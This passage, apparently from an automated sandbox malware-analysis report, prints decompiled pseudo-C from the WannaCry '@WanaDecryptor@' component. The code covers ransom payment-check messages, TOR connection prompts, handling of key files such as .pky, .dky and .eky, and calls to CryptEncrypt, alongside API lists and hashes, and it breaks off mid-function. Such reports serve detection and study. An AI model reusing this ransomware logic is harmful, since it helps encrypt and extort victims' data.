                                  • API ID: #800$#858$#4129#922$#4277#5710#6648#6778#940$#923InvalidateRect
                                  • String ID:
                                  • API String ID: 2121400562-0
                                  • Opcode ID: b4a9873a0028e0a5de6b54efbba54189251206de77b36b87668466cc29092242
                                  • Instruction ID: 4ea7c19ebb0ecad4eacefd8b4ebc091e45acf9db756171f3a68d6c32b1a6cadd
                                  • Opcode Fuzzy Hash: b4a9873a0028e0a5de6b54efbba54189251206de77b36b87668466cc29092242
                                  • Instruction Fuzzy Hash: A4A1B770204B81AFC714DB29C590A6FB7E6EFD4304F040A1EF596D3391D7B8E8558B66
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E004086E0(intOrPtr* __ecx, void* __ebp, signed long long __fp0) {
                                  				struct HBRUSH__* _v8;
                                  				char _v16;
                                  				char _v28;
                                  				intOrPtr _v36;
                                  				char _v52;
                                  				char _v76;
                                  				char _v88;
                                  				intOrPtr _v120;
                                  				intOrPtr _v124;
                                  				struct HDC__* _v128;
                                  				signed int _v132;
                                  				void* _v136;
                                  				char _v144;
                                  				signed int _v148;
                                  				struct HBRUSH__* _v152;
                                  				intOrPtr _v156;
                                  				struct HBRUSH__* _v160;
                                  				char _v164;
                                  				void* _v168;
                                  				long _v172;
                                  				char _v176;
                                  				char _v180;
                                  				struct tagRECT _v196;
                                  				intOrPtr _v200;
                                  				char* _v204;
                                  				signed int _v208;
                                  				signed int _v212;
                                  				char _v216;
                                  				intOrPtr _v220;
                                  				char _v224;
                                  				char _v228;
                                  				struct HBRUSH__* _v232;
                                  				intOrPtr _v236;
                                  				char _v240;
                                  				intOrPtr _v244;
                                  				intOrPtr _v248;
                                  				struct HDC__* _v252;
                                  				char _v256;
                                  				struct HBRUSH__* _v260;
                                  				struct HBRUSH__* _v264;
                                  				char _v268;
                                  				intOrPtr _v272;
                                  				intOrPtr _v276;
                                  				char _v280;
                                  				struct HBRUSH__* _v284;
                                  				struct HBRUSH__* _v288;
                                  				char _v292;
                                  				intOrPtr _v300;
                                  				char _v324;
                                  				signed int _t146;
                                  				intOrPtr _t148;
                                  				signed int _t150;
                                  				void* _t152;
                                  				intOrPtr _t155;
                                  				char _t163;
                                  				char* _t165;
                                  				RECT* _t177;
                                  				struct HBRUSH__* _t182;
                                  				intOrPtr _t206;
                                  				signed int _t276;
                                  				intOrPtr _t277;
                                  				intOrPtr* _t281;
                                  				void* _t283;
                                  				long _t284;
                                  				intOrPtr _t286;
                                  				intOrPtr _t291;
                                  				signed long long _t299;
                                  				signed long long _t301;
                                  				signed long long _t303;
                                  
                                  				_t299 = __fp0;
                                  				_t283 = __ebp;
                                  				_push(0xffffffff);
                                  				_push(E00414055);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t286;
                                  				_t281 = __ecx;
                                  				_push(__ecx);
                                  				L00412DD0();
                                  				_v8 = 0;
                                  				GetClientRect( *(__ecx + 0x20),  &(_v196.right));
                                  				_v172 = SendMessageA( *(_t281 + 0x20), 0x408, 0, 0);
                                  				_push( &_v164);
                                  				_push( &_v168);
                                  				L00412FFE();
                                  				L00412E54();
                                  				_v16 = 1;
                                  				E00407640( &_v240);
                                  				_v240 = 0x41675c;
                                  				_t206 = _v120;
                                  				_t146 = 0 | _t206 == 0x00000000;
                                  				_v16 = 2;
                                  				_v256 = 0x4166e0;
                                  				_v228 =  &_v132;
                                  				_v232 = 0;
                                  				_v208 = _t146;
                                  				if(_t146 == 0) {
                                  					_v244 = _t206;
                                  					_v248 = _v124;
                                  					_v252 = _v128;
                                  				} else {
                                  					 *((intOrPtr*)(_v132 + 0x58))( &_v224);
                                  					asm("sbb eax, eax");
                                  					_push(CreateCompatibleDC( ~( &_v136) & _v132));
                                  					L00412E4E();
                                  					E00409E70( &_v252,  &_v144, _v228 - _v236, _v224 - _v232);
                                  					_t35 =  &_v264; // 0x41675c
                                  					_v260 = E00409F10( &_v280, _t35);
                                  					_push(_v248);
                                  					_push(_v252);
                                  					_push( &_v76);
                                  					L00412FF8();
                                  				}
                                  				_v16 = 3;
                                  				_v204 =  &_v256;
                                  				_t148 =  *((intOrPtr*)(_t281 + 0x5c));
                                  				_t291 = _t148;
                                  				if(_t291 == 0) {
                                  					_push( *((intOrPtr*)(_t281 + 0x58)));
                                  					_push( &_v196);
                                  					L00412FF2();
                                  				} else {
                                  					if(_t291 != 0) {
                                  						_t182 =  *(_t148 + 4);
                                  					} else {
                                  						_t182 = 0;
                                  					}
                                  					FillRect(_v252,  &_v196, _t182);
                                  				}
                                  				_push(_t281 + 0x74);
                                  				L00412FEC();
                                  				_t150 = _v196.top;
                                  				if(_t150 < _v196.right.left || _t150 > _v196.bottom) {
                                  					_v268 = 0x4166e0;
                                  					_v28 = 5;
                                  					if(_v220 == 0) {
                                  						_v260 = 0;
                                  						_v264 = 0;
                                  					} else {
                                  						_t153 = _v232;
                                  						E00409F80(_v240, _v236, _v232, _v228 - _v236, _v224 - _v232,  &_v268, _v236, _t153, 0xcc0020);
                                  						_t155 = _v276;
                                  						if(_t155 != 0) {
                                  							_push( *((intOrPtr*)(_t155 + 4)));
                                  							_push(_v264);
                                  							L00412E48();
                                  						} else {
                                  							_push(0);
                                  							_push(_v264);
                                  							L00412E48();
                                  						}
                                  					}
                                  					_v28 = 4;
                                  				} else {
                                  					L00412FE6();
                                  					_v212 = _t150;
                                  					_t276 = _t150 & 0x00008000;
                                  					_v148 = _t150 & 0x00002000;
                                  					_v180 = 0;
                                  					_v176 = 0;
                                  					_v168 = 0;
                                  					_v164 = 0;
                                  					_v160 = 0;
                                  					_v152 = 0;
                                  					if((_t150 & 0x00000004) == 0) {
                                  						_v156 = _v200 - _v208;
                                  					} else {
                                  						_v156 = _v196.left - _v204;
                                  					}
                                  					asm("fild dword [esp+0x80]");
                                  					_push(_t283);
                                  					_t284 = _v196.right.left;
                                  					_t163 = _v196.top - _t284;
                                  					_v272 = _v196.bottom - _t284;
                                  					asm("fild dword [esp+0x10]");
                                  					_v272 = _t163;
                                  					asm("fild dword [esp+0x10]");
                                  					_t301 = _t299 * st2 / st1;
                                  					L0041304A();
                                  					_v172 = _t163;
                                  					if(_t276 == 0) {
                                  						st0 = _t301;
                                  						st0 = _t301;
                                  					} else {
                                  						_v272 =  *((intOrPtr*)(_t281 + 0x68)) - _t284;
                                  						asm("fild dword [esp+0x10]");
                                  						_t303 = _t301 * st2 / st1;
                                  						L0041304A();
                                  						st0 = _t303;
                                  						st0 = _t303;
                                  						_v180 = _t163;
                                  					}
                                  					_t277 =  *((intOrPtr*)(_t281 + 0x54));
                                  					if(_t277 == 0) {
                                  						_t165 =  &_v180;
                                  						if(_v148 == 0) {
                                  							_t165 =  &_v164;
                                  						}
                                  						 *((intOrPtr*)( *_t281 + 0xc0))( &_v216, _t165,  &_v180);
                                  					} else {
                                  						_t177 = E00409D40( &_v52,  &_v216,  &_v180);
                                  						if(_t277 != 0) {
                                  							FillRect(_v264, _t177,  *(_t277 + 4));
                                  						} else {
                                  							FillRect(_v264, _t177, 0);
                                  						}
                                  					}
                                  					 *((intOrPtr*)( *_t281 + 0xc8))( &_v228,  &_v176,  &(_v196.top));
                                  					_v292 = 0x4166e0;
                                  					_v52 = 7;
                                  					if(_v244 == 0) {
                                  						_v284 = 0;
                                  						_v288 = 0;
                                  						_v52 = 6;
                                  					} else {
                                  						_t172 = _v256;
                                  						E00409F80(_v264, _v260, _v256, _v252 - _v260, _v248 - _v256,  &_v292, _v260, _t172, 0xcc0020);
                                  						_t112 =  &_v324; // 0x4166e0
                                  						E00409F10(_t112, _v300);
                                  						_v88 = 6;
                                  					}
                                  				}
                                  				_t133 =  &_v252; // 0x41675c
                                  				_t152 = E00409E20(_t133);
                                  				_v28 = 0;
                                  				L00412E3C();
                                  				_v28 = 0xffffffff;
                                  				L00412DB8();
                                  				 *[fs:0x0] = _v36;
                                  				return _t152;
                                  			}

                                  APIs
                                  • #470.MFC42 ref: 00408708
                                  • GetClientRect.USER32(?,?), ref: 0040871F
                                  • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 00408730
                                  • #6734.MFC42(?,?), ref: 00408746
                                  • #323.MFC42(?,?), ref: 0040874F
                                  • CreateCompatibleDC.GDI32(?), ref: 004087D2
                                  • #1640.MFC42(00000000), ref: 004087DD
                                    • Part of subcall function 00409E70: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00409E85
                                    • Part of subcall function 00409E70: #1641.MFC42(00000000,?,00408809,?,?,?,00000000), ref: 00409E8E
                                    • Part of subcall function 00409F10: #5785.MFC42(?,?,00408A5E,?,?,?,?,?,?,?,?,00CC0020), ref: 00409F1D
                                  • #6194.MFC42(?,?,?,\gA,?,?,?,00000000), ref: 00408831
                                  • FillRect.USER32(?,?,?), ref: 0040887D
                                  • #2754.MFC42(?,?), ref: 00408892
                                  • #2381.MFC42(?,?,?), ref: 0040889F
                                  • #3797.MFC42(?,?,?), ref: 004088C0
                                  • _ftol.MSVCRT ref: 00408951
                                  • _ftol.MSVCRT ref: 0040896F
                                  • FillRect.USER32(?,00000000,00000000), ref: 004089B0
                                  • #640.MFC42(?,?,?), ref: 00408B09
                                  • #755.MFC42(?,?,?), ref: 00408B20
                                    • Part of subcall function 00409F80: BitBlt.GDI32(?,?,?,?,\gA,?,\gA,\gA,\gA), ref: 00409FB3
                                    • Part of subcall function 00409F10: #5785.MFC42(?,?,00408A5E,?,?,?,?,?,?,?,?,00CC0020), ref: 00409F2D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Rect$#5785CompatibleCreateFill_ftol$#1640#1641#2381#2754#323#3797#470#6194#640#6734#755BitmapClientMessageSend
                                  • String ID: \gA$fA$fA
                                  • API String ID: 1027735583-2217880857
                                  • Opcode ID: 6ed80f763e045306e10188d4e497fb721b5fce89834b9b0f8741aa09041edacc
                                  • Instruction ID: b72dd9534e9f1d52b621f8c4883ea919de29669ae4f9aefa89eb3b477b52946b
                                  • Opcode Fuzzy Hash: 6ed80f763e045306e10188d4e497fb721b5fce89834b9b0f8741aa09041edacc
                                  • Instruction Fuzzy Hash: 33D12CB16083419FC314DF25C984AAFBBE9BBC8304F508E2EF1D993291DB749949CB56
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _wcsicmp$_wcsnicmpwcsstr
                                  • String ID: This folder protects against ransomware. Modifying it will reduce protection$Content.IE5$N(@$Temporary Internet Files$\AppData\Local\Temp$\Intel$\Local Settings\Temp$\Program Files$\Program Files (x86)$\ProgramData$\WINDOWS
                                  • API String ID: 2817753184-2613825984
                                  • Opcode ID: 5c5dcd1e390a91f16435822322ea41988894e25d1b71caeb8710faf8d967a9e6
                                  • Instruction ID: 690a6d88e0cbcba8c0a0bc490ea4abea364cf6131422823267360e98b5ddcfca
                                  • Opcode Fuzzy Hash: 5c5dcd1e390a91f16435822322ea41988894e25d1b71caeb8710faf8d967a9e6
                                  • Instruction Fuzzy Hash: 3831843235162023D520691D7D4AFCB638C8FE5727F554033FD44E52C1E29EB96A82BD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 61%
                                  			E00401760(void* __ecx) {
                                  				int _v8;
                                  				intOrPtr _v12;
                                  				char _v20;
                                  				struct _IO_FILE* _v32;
                                  				void _v2059;
                                  				void _v2060;
                                  				void _v2571;
                                  				void _v2572;
                                  				char _v2576;
                                  				char _v2604;
                                  				void* _v2608;
                                  				char _v2616;
                                  				void* _v2636;
                                  				void* _v2640;
                                  				void* _t36;
                                  				struct _IO_FILE* _t37;
                                  				signed int _t38;
                                  				unsigned int _t45;
                                  				signed int _t49;
                                  				void* _t50;
                                  				signed int _t67;
                                  				struct _IO_FILE* _t87;
                                  				void* _t94;
                                  				void* _t97;
                                  				intOrPtr _t98;
                                  				void* _t99;
                                  
                                  				_push(0xffffffff);
                                  				_push(E004134C6);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t98;
                                  				_t99 = _t98 - 0xa28;
                                  				_t94 = __ecx;
                                  				L00412CD4();
                                  				_t36 =  *(__ecx + 0xac);
                                  				if(_t36 != 0) {
                                  					WaitForSingleObject(_t36, 0xbb8);
                                  					TerminateThread( *(_t94 + 0xac), 0);
                                  					CloseHandle( *(_t94 + 0xac));
                                  				}
                                  				_t37 = E0040C670();
                                  				if( *((intOrPtr*)(_t94 + 0xb4)) != 0) {
                                  					L15:
                                  					 *[fs:0x0] = _v12;
                                  					return _t37;
                                  				} else {
                                  					_t37 =  *(_t94 + 0xa8);
                                  					if(_t37 != 1) {
                                  						if(_t37 != 0xffffffff) {
                                  							if(_t37 != 2) {
                                  								goto L15;
                                  							}
                                  							_push(0);
                                  							_push(0x40);
                                  							_push("Congratulations! Your payment has been checked!\nStart decrypting now!");
                                  							L14:
                                  							L00412CC8();
                                  							goto L15;
                                  						}
                                  						if( *((intOrPtr*)(_t94 + 0xa0)) == 0) {
                                  							L11:
                                  							_push(0);
                                  							_push(0xf0);
                                  							_push("You did not pay or we did not confirmed your payment!\nPay now if you didn\'t and check again after 2 hours.\n\nBest time to check: 9:00am - 11:00am GMT from Monday to Friday.");
                                  							goto L14;
                                  						}
                                  						_t38 = rand();
                                  						asm("cdq");
                                  						_t37 = _t38 / 3;
                                  						if(_t38 % 3 != 0) {
                                  							goto L11;
                                  						}
                                  						_push(0);
                                  						_push(0x30);
                                  						_push("Failed to check your payment!\nPlease make sure that your computer is connected to the Internet and \nyour Internet Service Provider (ISP) does not block connections to the TOR Network!");
                                  						goto L14;
                                  					}
                                  					_v2572 = 0;
                                  					memset( &_v2571, 0, 0x7f << 2);
                                  					asm("stosw");
                                  					asm("stosb");
                                  					_v2060 = 0;
                                  					memset( &_v2059, 0, 0x1ff << 2);
                                  					asm("stosw");
                                  					asm("stosb");
                                  					sprintf( &_v2604, "%08X.dky", 0);
                                  					_t37 = fopen( &_v2604, "rb");
                                  					_t87 = _t37;
                                  					_t99 = _t99 + 0x2c;
                                  					if(_t87 == 0) {
                                  						_push(0);
                                  						_push(0xf0);
                                  						_push("You did not pay or we did not confirmed your payment!\nPay now if you didn\'t and check again after 2 hours.\n\nBest time to check: 9:00am - 11:00am GMT from Monday to Friday.");
                                  						L00412CC8();
                                  						 *(_t94 + 0xa8) = 0xffffffff;
                                  					} else {
                                  						_t45 = fread( &_v2060, 1, 0x800, _t87);
                                  						fclose(_t87);
                                  						DeleteFileA( &_v2604);
                                  						_t97 =  &_v2060;
                                  						_t67 = _t45 >> 2;
                                  						_t49 = memcpy( &_v2572, _t97, _t67 << 2);
                                  						_push("You have a new message:\n");
                                  						_t50 = memcpy(_t97 + _t67 + _t67, _t97, _t49 & 0x00000003);
                                  						_t99 = _t99 + 0x2c;
                                  						L00412CAA();
                                  						_push( &_v2576);
                                  						_push(_t50);
                                  						_push( &_v2616);
                                  						_v8 = 0;
                                  						L00412CCE();
                                  						_t37 =  *_t50;
                                  						_push(0);
                                  						_push(0x40);
                                  						_push(_t37);
                                  						_v20 = 1;
                                  						L00412CC8();
                                  						_v32 = 0;
                                  						L00412CC2();
                                  						_v32 = 0xffffffff;
                                  						L00412CC2();
                                  					}
                                  					goto L15;
                                  				}
                                  			}


                                  APIs
                                  • #6453.MFC42 ref: 00401780
                                  • WaitForSingleObject.KERNEL32(?,00000BB8), ref: 00401797
                                  • TerminateThread.KERNEL32(?,00000000), ref: 004017A5
                                  • CloseHandle.KERNEL32(?), ref: 004017B2
                                  • sprintf.MSVCRT ref: 00401811
                                  • fopen.MSVCRT ref: 00401821
                                  • fread.MSVCRT ref: 00401844
                                  • fclose.MSVCRT ref: 0040184D
                                  • DeleteFileA.KERNEL32(?), ref: 0040185B
                                  • #537.MFC42(You have a new message:), ref: 00401885
                                  • #924.MFC42(?,00000000,?,You have a new message:), ref: 0040189C
                                  • #1200.MFC42 ref: 004018AF
                                  • #800.MFC42 ref: 004018BF
                                  • #800.MFC42 ref: 004018D3
                                  • #1200.MFC42(You did not pay or we did not confirmed your payment!Pay now if you didn't and check again after 2 hours.Best time to check: 9:00am - 11:00am GMT from Monday to Friday.,000000F0,00000000), ref: 004018E5
                                  Strings
                                  • Failed to check your payment!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!, xrefs: 00401918
                                  • You have a new message:, xrefs: 00401877
                                  • You did not pay or we did not confirmed your payment!Pay now if you didn't and check again after 2 hours.Best time to check: 9:00am - 11:00am GMT from Monday to Friday., xrefs: 004018E0, 00401925
                                  • %08X.dky, xrefs: 0040180A
                                  • Congratulations! Your payment has been checked!Start decrypting now!, xrefs: 00401934
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #1200#800$#537#6453#924CloseDeleteFileHandleObjectSingleTerminateThreadWaitfclosefopenfreadsprintf
                                  • String ID: %08X.dky$Congratulations! Your payment has been checked!Start decrypting now!$Failed to check your payment!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!$You did not pay or we did not confirmed your payment!Pay now if you didn't and check again after 2 hours.Best time to check: 9:00am - 11:00am GMT from Monday to Friday.$You have a new message:
                                  • API String ID: 2207195628-1375496427
                                  • Opcode ID: 0124457e6eab98ad7ab5e08ccab151a7b3cccaeabfe0b10511df38693a1a7d3a
                                  • Instruction ID: 8b94a0d45af64711c1f2f56a46f7a966efbefe6460f93d7d0814001cf74dce0a
                                  • Opcode Fuzzy Hash: 0124457e6eab98ad7ab5e08ccab151a7b3cccaeabfe0b10511df38693a1a7d3a
                                  • Instruction Fuzzy Hash: 1D41F371244740EFC330DB64C895BEB7699AB85710F404A3EF25AA32E0DABC5944CB6B
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 53%
                                  			E004012E0(void* __ecx) {
                                  				int _v4;
                                  				intOrPtr _v12;
                                  				void _v2059;
                                  				void _v2060;
                                  				void _v2192;
                                  				void _v2196;
                                  				intOrPtr _v2324;
                                  				void _v2328;
                                  				void _v2332;
                                  				char _v2364;
                                  				char _v2396;
                                  				char _v2436;
                                  				char _v2468;
                                  				char _v2508;
                                  				char _v2540;
                                  				intOrPtr _t61;
                                  				long _t65;
                                  				struct _IO_FILE* _t83;
                                  				int _t85;
                                  				intOrPtr _t88;
                                  				struct _IO_FILE* _t91;
                                  				int _t97;
                                  				void* _t100;
                                  				char* _t123;
                                  				void _t131;
                                  				struct _IO_FILE* _t143;
                                  				struct _IO_FILE* _t146;
                                  				struct _IO_FILE* _t149;
                                  				void* _t154;
                                  				signed int _t156;
                                  				signed int _t157;
                                  				intOrPtr _t161;
                                  				void* _t164;
                                  				void* _t166;
                                  				void* _t169;
                                  				void* _t172;
                                  
                                  				_push(0xffffffff);
                                  				_push(E004134A6);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t161;
                                  				_t61 =  *0x42189c; // 0x0
                                  				_push(_t156);
                                  				_t154 = __ecx;
                                  				_t3 = _t61 + 0x50c; // 0x50c
                                  				_t100 = _t3;
                                  				sprintf( &_v2468, "%08X.pky",  *((intOrPtr*)(__ecx + 0xa4)));
                                  				sprintf( &_v2540, "%08X.dky",  *((intOrPtr*)(_t154 + 0xa4)));
                                  				_t164 = _t161 - 0x9e0 + 0x18;
                                  				_t65 = GetFileAttributesA( &_v2540);
                                  				_t157 = _t156 | 0xffffffff;
                                  				if(_t65 == _t157) {
                                  					L4:
                                  					_v2196 = 0;
                                  					memset( &_v2192, 0, 0x21 << 2);
                                  					_t143 = fopen("00000000.res", "rb");
                                  					_t166 = _t164 + 0x14;
                                  					__eflags = _t143;
                                  					if(_t143 != 0) {
                                  						fread( &_v2196, 0x88, 1, _t143);
                                  						fclose(_t143);
                                  						_v2332 = 0;
                                  						memset( &_v2328, 0, 0x21 << 2);
                                  						sprintf( &_v2364, "%08X.res",  *((intOrPtr*)(_t154 + 0xa4)));
                                  						_t146 = fopen( &_v2364, "rb");
                                  						_t169 = _t166 + 0x34;
                                  						__eflags = _t146;
                                  						if(_t146 != 0) {
                                  							fread( &_v2332, 0x88, 1, _t146);
                                  							fclose(_t146);
                                  							_t131 =  *0x421798; // 0x0
                                  							_v2060 = _t131;
                                  							memset( &_v2059, 0, 0x1ff << 2);
                                  							asm("stosw");
                                  							asm("stosb");
                                  							sprintf( &_v2396, "%08X.eky",  *((intOrPtr*)(_t154 + 0xa4)));
                                  							_t83 = fopen( &_v2396, "rb");
                                  							_t149 = _t83;
                                  							_t172 = _t169 + 0x34;
                                  							__eflags = _t149;
                                  							if(_t149 != 0) {
                                  								_t85 = fread( &_v2060, 1, 0x800, _t149);
                                  								fclose(_t149);
                                  								_t39 = _t100 + 0x242; // 0x74e
                                  								_t40 = _t100 + 0x1de; // 0x6ea
                                  								E0040BE90("s.wnry", _t40, _t39);
                                  								_t88 =  *0x42189c; // 0x0
                                  								_push( *((intOrPtr*)(_t154 + 0x20)));
                                  								_push( &_v2540);
                                  								_push( *((intOrPtr*)(_t88 + 0x818)));
                                  								_push( *((intOrPtr*)(_t88 + 0x81c)));
                                  								_t46 = _t100 + 0xb2; // 0x5be
                                  								_push(_t85);
                                  								_push( &_v2060);
                                  								_push(_v2324);
                                  								_push( &_v2332);
                                  								_push( &_v2196);
                                  								_push(_t100 + 0xe4);
                                  								_t91 = E0040C240( &_v2332, __eflags);
                                  								_t172 = _t172 + 0x4c;
                                  								_t83 = E0040C670();
                                  								__eflags = _t91;
                                  								if(_t91 >= 0) {
                                  									E00404640( &_v2436);
                                  									_v4 = 1;
                                  									_t94 = E004047C0( &_v2436,  &_v2468,  &_v2540);
                                  									__eflags = _t94;
                                  									if(_t94 == 0) {
                                  										 *(_t154 + 0xa8) = 1;
                                  									} else {
                                  										 *(_t154 + 0xa8) = 2;
                                  									}
                                  									_v4 = 0xffffffff;
                                  									_t123 =  &_v2436;
                                  									goto L15;
                                  								}
                                  							} else {
                                  								 *(_t154 + 0xa8) = 0xffffffff;
                                  							}
                                  						} else {
                                  							 *(_t154 + 0xa8) = 0xffffffff;
                                  						}
                                  					} else {
                                  						 *(_t154 + 0xa8) = _t157;
                                  					}
                                  				} else {
                                  					E00404640( &_v2508);
                                  					_v4 = 0;
                                  					if(E004047C0( &_v2508,  &_v2468,  &_v2540) == 0) {
                                  						_t97 = DeleteFileA( &_v2540);
                                  						_v4 = _t157;
                                  						E00404690(_t97,  &_v2508);
                                  						goto L4;
                                  					} else {
                                  						 *(_t154 + 0xa8) = 2;
                                  						_v4 = _t157;
                                  						_t123 =  &_v2508;
                                  						L15:
                                  						_t83 = E00404690(_t94, _t123);
                                  					}
                                  				}
                                  				 *[fs:0x0] = _v12;
                                  				return _t83;
                                  			}

                                  APIs
                                  • sprintf.MSVCRT ref: 00401323
                                  • sprintf.MSVCRT ref: 00401339
                                  • GetFileAttributesA.KERNEL32(?), ref: 00401343
                                  • DeleteFileA.KERNEL32(?), ref: 0040139A
                                  • fread.MSVCRT ref: 00401405
                                  • fclose.MSVCRT ref: 00401408
                                  • sprintf.MSVCRT ref: 00401440
                                  • fopen.MSVCRT ref: 00401453
                                    • Part of subcall function 00404690: DeleteCriticalSection.KERNEL32(?,004015D8), ref: 0040469A
                                  • fopen.MSVCRT ref: 004013D5
                                    • Part of subcall function 00404640: InitializeCriticalSection.KERNEL32(?,?,0040158C), ref: 00404658
                                    • Part of subcall function 004047C0: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?,00000200), ref: 004048DB
                                    • Part of subcall function 004047C0: _local_unwind2.MSVCRT ref: 004048EB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: sprintf$CriticalDeleteFileSectionfopen$AttributesCryptEncryptInitialize_local_unwind2fclosefread
                                  • String ID: %08X.dky$%08X.eky$%08X.pky$%08X.res$00000000.res$s.wnry
                                  • API String ID: 2787528210-4016014174
                                  • Opcode ID: 57a51ecc688d2c0761643bc18b0e2b9a7bca0d11f95f7de6ced9b52eb20b7f63
                                  • Instruction ID: 5d668cda142e4e69bdcb8de65b1bf6b3866dc1aa9a0cfc7ced8feefa58b75360
                                  • Opcode Fuzzy Hash: 57a51ecc688d2c0761643bc18b0e2b9a7bca0d11f95f7de6ced9b52eb20b7f63
                                  • Instruction Fuzzy Hash: 8A71BFB1104741AFD320DB60CC85FEBB3E9ABC4310F404A3EE59A87290EB78A4498B56
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 75%
                                  			E004035A0(intOrPtr __ecx) {
                                  				int _t51;
                                  				void* _t54;
                                  				long _t55;
                                  				signed int _t64;
                                  				signed int _t68;
                                  				void* _t71;
                                  				int _t78;
                                  				short _t86;
                                  				signed int _t92;
                                  				intOrPtr _t110;
                                  				int _t121;
                                  				void* _t122;
                                  				void* _t123;
                                  				void* _t126;
                                  				void* _t128;
                                  				intOrPtr _t129;
                                  				void* _t130;
                                  				void* _t132;
                                  				void* _t134;
                                  
                                  				_push(0xffffffff);
                                  				_push(E0041365C);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t129;
                                  				_t130 = _t129 - 0x2e4;
                                  				_t110 = __ecx;
                                  				 *((intOrPtr*)(_t130 + 0x28)) = __ecx;
                                  				_t51 = SendMessageA( *(__ecx + 0x80), 0x1004, 0, 0);
                                  				if(_t51 != 0) {
                                  					_t51 = OpenClipboard( *(_t110 + 0x20));
                                  					if(_t51 != 0) {
                                  						_t121 = 0;
                                  						_t126 = 0;
                                  						if(SendMessageA( *(_t110 + 0x80), 0x1004, 0, 0) > 0) {
                                  							do {
                                  								_push(0);
                                  								_t71 = _t130 + 0x18;
                                  								_push(_t121);
                                  								_push(_t71);
                                  								L00412D7C();
                                  								_push(0x4206e0);
                                  								_push(_t71);
                                  								_push(_t130 + 0x14);
                                  								 *(_t130 + 0x308) = 0;
                                  								L00412CCE();
                                  								 *(_t130 + 0x2fc) = 2;
                                  								L00412CC2();
                                  								 *(_t130 + 0x2fc) = 0xffffffff;
                                  								_t126 = _t126 +  *( *(_t130 + 0x10) - 8) * 2;
                                  								L00412CC2();
                                  								_t121 = _t121 + 1;
                                  							} while (_t121 < SendMessageA( *(_t110 + 0x80), 0x1004, 0, 0));
                                  						}
                                  						_t122 = GlobalAlloc(2, _t126 + 2);
                                  						 *(_t130 + 0x14) = _t122;
                                  						if(_t122 != 0) {
                                  							_t54 = GlobalLock(_t122);
                                  							 *(_t130 + 0x10) = _t54;
                                  							if(_t54 != 0) {
                                  								_t78 = 0;
                                  								_t128 = 0;
                                  								_t55 = SendMessageA( *(_t110 + 0x80), 0x1004, 0, 0);
                                  								if(_t55 > 0) {
                                  									while(1) {
                                  										_push(0);
                                  										_push(_t78);
